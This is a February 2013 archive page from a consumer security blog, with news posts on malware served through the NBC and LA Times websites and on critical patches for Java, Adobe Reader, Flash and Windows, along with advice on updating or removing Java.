Archive for February, 2013

NBC website serving malware – stay away!

February 21, 2013
NBC’s website has been compromised, and is redirecting users to malicious sites, reports Dancho Danchev.

According to HitmanPro, the website has been injected with malicious iFrames that lead to one of several compromised sites equipped with Java and PDF exploits.

It seems that upon successful exploitation of one of the vulnerabilities, the users are saddled with variants of the Citadel info-stealing Trojan that currently aren’t detected by many AV solutions.

The server with which the malware communicates has already been sinkholed. Nevertheless, if you have visited the news outlet’s website today, and your AV hasn’t picked up on anything, use a new one to double check – preferably one of these that at the moment do.

Visiting the NBC’s website is, for the time being, still dangerous, and even Facebook has moved to protect its users by not allowing the posting of the site’s URL.

Danchev has tied the campaign with two previous email ones that impersonated Facebook and Verizon.


Critical Security Updates for Adobe Reader, Java

February 20, 2013

Adobe and Oracle each released updates to fix critical security holes in their software. Adobe’s patch plugs two zero-day holes that hackers have been using to break into computers via Adobe Reader and Acrobat. Separately, Oracle issued updates to correct at least five security issues with Java.

javaiconThe Java update comes amid revelations by AppleFacebook and Twitter that employees at these organizations were hacked using exploits that attacked Java vulnerabilities on Mac and Windows machines. According to Bloomberg News, at least 40 companies were targeted in malware attacks linked to an Eastern European gang of hackers that has been trying to steal corporate secrets.

Oracle’s update brings Java on Windows systems to Java SE 7 Update 15, and Java 6 Update 41. Most consumers can get by without Java installed, or least not plugged into the browser. Because of the prevalence of threats targeting Java installations, I’d urge these users to remove Java or unplug it from the browser. If this is too much trouble, consider adopting a dual-browser approach, keeping Java unplugged from your main browser, and plugged in to a secondary browser that you only use to visit sites that require the plugin. To find out if you have Java installed, visit and click the “Do I have Java?” link below the big red button. Existing users can update Java from the Java Control Panel, clicking the Update tab and then the “Update Now” button.

Apple has issued an update that brings Java up-to-date on security patches but also disables the Java plugin from Web browsers on the system. Apple also issued a malware removal tool that it said should remove from Macs the most common variants of malware that used the most recent Java exploits.

Adobe’s update brings Reader XI to version 11.0.2 and Reader X to v. 10.1.6 on both Mac and windows (see the graphic below for other versions). This patch fixes a couple of critical flaws that Adobe said last week hackers were exploiting to break into vulnerable systems.


Finally, Firefox users may be happy to know that the newest version of the browser now includes its own PDF viewer. According to, Firefox 19 “includes PDF.js, a JavaScript library intended to convert PDF files into HTML5, which was started by Andreas Gal and Chris Jones as a research project that eventually picked up steam within Mozilla Labs. Technically, the tool has been in Firefox for many versions, but you had to manually enable it. The whole point of the built-in PDF viewer is to avoid having to use plugins with proprietary closed source code “that could potentially expose users to security vulnerabilities,” according to Mozilla. It also cuts down on extra bloat that Firefox can already do: PDF viewing plugins have their own code for drawing images and text.”

This is why you need to keep up with your software updates!

February 14, 2013
LA Times website redirected users to exploit kit for over six weeks
Posted on 14 February 2013.
A sub-domain of Los Angeles Times’ website has been redirecting visitors to compromised websites hosting the latest version of the Blackhole exploit kit for over six weeks (since Dec. 23, 2012), says Brian Krebs, and estimates that some 325,000 visitors were exposed to the attack.
Alerted to the fact that something was wrong with by some of its readers, he investigated the matter with the help of Avast’s director of threat intelligence Jindrich Kubec, who checked it and confirmed that the tips were, indeed, true and correct.When first contacted, LA Times spokeswoman Hillary Manning stated that the problem was tied to the recent hack of the NetSeer advertising network site, which resulted in Google blocking popular third-party sites – among them the New York Times, the Washington Post, ZDNet and the LA Times – that were serving ads provided by the ad network. She claimed that the problem had been solved and that there were no additional ones.

Unfortunately for the publication, that was not true, as Avast and other security companies continued to detect exploits coming from the sub-domain. In a statement released a few hours later, the LA Times conceded that the security companies’ readings were accurate, and that they resolved the situation.

“On February 6th the Los Angeles Times was made aware that malware was possibly being served by We quickly determined the problem was contained within the Offers & Deals sub-domain, which is maintained by a third party,” they stated.

“Our forensics team undertook what is now an ongoing investigation and is working closely with the vendor to collect evidence surrounding the event. To ensure safety, the Offers & Deals platform has been rebuilt and further secured. The sub-domain generates only advertising content and does not contain any customer information. As a trusted source of news and information, The Times takes matters of internet security very seriously and are pleased to report that there is no malware currently detectable on Offers & Deals.

Fat Tuesday Patch

February 12, 2013

Adobe and Microsoft each have issued security updates to fix multiple critical vulnerabilities in their products. Adobe released updates for Flash PlayerAIR and Shockwave; Microsoft pushed out a dozen patches addressing at least 57 security holes in WindowsOffice, Internet ExplorerExchange and .NET Framework.

Five of the 12 patches Microsoft released today earned its most dire “critical” label, meaning these updates fix vulnerabilities that attackers or malware could exploit to seize complete control over a PC with no help from users.

Thirteen of the 57 bugs squashed in Microsoft’s patch batch address issues with Internet Explorer; other critical patches fix problems in the Windows implementation of Vector Markup Language (VML), Microsoft Exchange, and flaws in the way Windows handles certain media files. The remaining critical patch fixes a flaw that is present only on Windows XP systems.

Updates are available via Windows Update or from Automatic Update. A note about applying these Windows patches: Today’s batch includes an update for .NET, which in my experience should be applied separately. In nearly every case where I’ve experienced problems updating Windows, a huge .NET patch somehow gummed up the works. Consider applying the rest of the patches first, rebooting, and then installing the .NET update, if your system requires it.

And for the second time in a week, Adobe has released an update for its Flash Player software. This one addresses at least 17  distinct vulnerabilities; unlike last weeks emergency Flash Update, this one thankfully doesn’t address flaws that are already actively being exploited, according to Adobe. Check the graphic below for the most recent version that includes the updates relevant to your operating system. This link should tell you which version of Flash your browser has installed. The most recent versions are available from the Adobe download center, but beware potentially unwanted addons, like McAfee Security Scan). To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

Adobe 11.6.602

Chrome and Internet Explorer 10 have built-in auto-update features that should bring Flash to the most recent version. The patched version of Flash for Chrome is 11.6.602.167, which Google pushed out today. Windows users who browse the Web with anything other than Internet Explorer will need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

As Adobe does every time it releases a Flash Update, it has released a fix for Adobe AIR. If you have that software installed, it can updated from this link.

Finally, as the graphic above indicates, a fix for Adobe’s Shockwave Player is available that fixes at least two flaws. The latest version of Shockwave is, available here.  You can find the new version and an accounting of whether you have this program installed and its current version from this page. If you have this program installed update it; if that page offers a download, you don’t have Shockwave installed and probably don’t need it.

Windows and OS X users under attack, update Flash now!

February 8, 2013

Adobe has pushed out an emergency Flash update that solves two critical vulnerabilities (CVE-2013-0633 and CVE-2013-0634) that are being actively exploited to target Windows and OS X users, and is urging users to implement it as soon as possible.

According to a security bulletin released on Thursday, the OS X exploit targets Flash Player in Firefox or Safari via malicious Flash content hosted on websites, while Windows users are targeted with Microsoft Word documents delivered as an email attachments which contain malicious Flash content.

Adobe has also announced its intention of adding new protections against malicious Flash content embedded in Microsoft Office documents to its next feature release of Flash Player.

“To protect users of Office 2008 and earlier, the upcoming release of Flash Player will determine whether Flash Player is being launched within Microsoft Office and check the version of Office. If Flash Player is launched within a version prior to Office 2010, Flash Player will prompt the end-user before executing the Flash content,” explained Peleus Uhley, Adobe’ platform security strategist.

“Therefore, if an end-user opens a document containing malicious Flash content, the malicious content will not immediately execute and impact the end-user. This extra step requires attackers to integrate a new level of social engineering that was previously not required.”

Users who have not enabled automatic updating of Flash can get their updates here or use the in-built updater in the Windows Control Panel or OS X System Preferences.

As a side note – I wonder if Mozilla is now reevaluating its recent decision to enable “Click to Play” in future Firefox release for all versions of all plugins except the current version of Flash?

In the meantime, FireEye researchers have examined the payload executed as a part of the above mentioned attacks spotted in the wild, and have discovered that “even though the contents of Word files are in English, the codepage of Word files are ‘Windows Simplified Chinese (PRC, Singapore)’,” which might explain the origin of the attacks.

“One of the dropped executable files is digitally signed with an invalid certificate from MGAME Corporation, a Korean gaming company. The same executable renames itself to try to pass itself off as the Google update process,” they shared.

The malware assures its persistence on infected computers by adding startup registry entries, checking for present AVs, and it establishes contact with its C&C server.v

Critical Java Update Fixes 50 Security Holes

February 3, 2013

Oracle Corp. has issued an update for its Java SE software that plugs at least 50 security holes in the software, including one the company said was actively being exploited in the wild.

javaiconThe original Critical Patch Update for Java SE – February 2013 had been scheduled to be released on February 19th, but Oracle said it decided to accelerate the release of this update because of active exploitation in the wild of one of the vulnerabilities.

“Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply…fixes as soon as possible,” the company wrote in an advisory.

I couldn’t find a definitive account of which zero-day vulnerability in Java had caused Oracle to move up its patch schedule, but recently researchers have uncovered flaws in a mechanism that the company shipped with the previous version of Java that was designed to thwart attacks on the program. With Java 7 Update 10, Oracle introduced a mechanism that would require users to manually allow the execution of Java code not digitally signed by a trusted authority. Some security experts praised Oracle for adding the feature because it promised to drastically reduce the success of attacks that exploit security bugs in Java, but researchers have shown that the new feature can be easily bypassed.


The latest versions — Java 7 Update 13 and Java 6 to Update 39 – are available either through the updater built into Java (accessible from the Windows control panel), or by visiting If you’re not sure which version you have or whether you’ve got the program installed at all, click the “Do I have Java” link below the red download button on the homepage.

Most end users who have Java on their systems probably don’t need it and can safely remove it (this advice does not scale for users of corporate systems, which may have specific applications that rely on Java). This is a buggy program that seems to produce a reliable stream of zero-day exploit opportunities for malware writers. So, if you don’t need it, junk it.

If you do need it, unplug it from the browser unless and until you need it. Starting with Java 7 Update 10, it is possible to disable Java content in web browsers through the Java control panel applet. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

Apple has been taking steps to block Java on OS X systems when new unpatched vulnerabilities have been detected. According to MacRumors, for the second time in a month, Apple blacklisted the current version of the Java Web plugin on OS X, using the “Xprotect” anti-malware system built into OS X to enforce a minimum version number that had yet to be released. However, now writes that Java 7 Update 13 for Mac OS X brings Java on the Mac to the correct version number enforced by Xprotect, meaning Mac users who need Java can use it again without having to monkey with Terminal command-line workarounds.

This is the final set of updates for Java 6 — Oracle is phasing it out and has already taken steps to beginmigrating Java 6 users to Java 7. Overall, this probably a good thing. Lawrence Garvin, the self-described “head geek” at Austin, Texas based network management and monitoring firm SolarWinds, said that while media attention to Java 7′s security issues may be influencing the decision by some organizations to delay upgrading their Java 6 installations, only 18 of the security issues identified since Java 7′s release are unique to Java 7.

“Of the 84 vulnerabilities identified since Java 7’s release, we found that 66 of these existed in Java 6, while 40 existed in Java 5,” Garvin said. “Press coverage around Java 7’s security issues may be influencing some organizations to fail to upgrade their Java 6 installations to Java 7, thinking that Java 7 is flawed, when in fact the entire core of theJava platform has vulnerabilities. Oracle has announced that no new updates will be forthcoming for Java 6 after February 2013, so that any additional vulnerability discovered in Java 7 – and also existing in Java 6 – will never be patched.”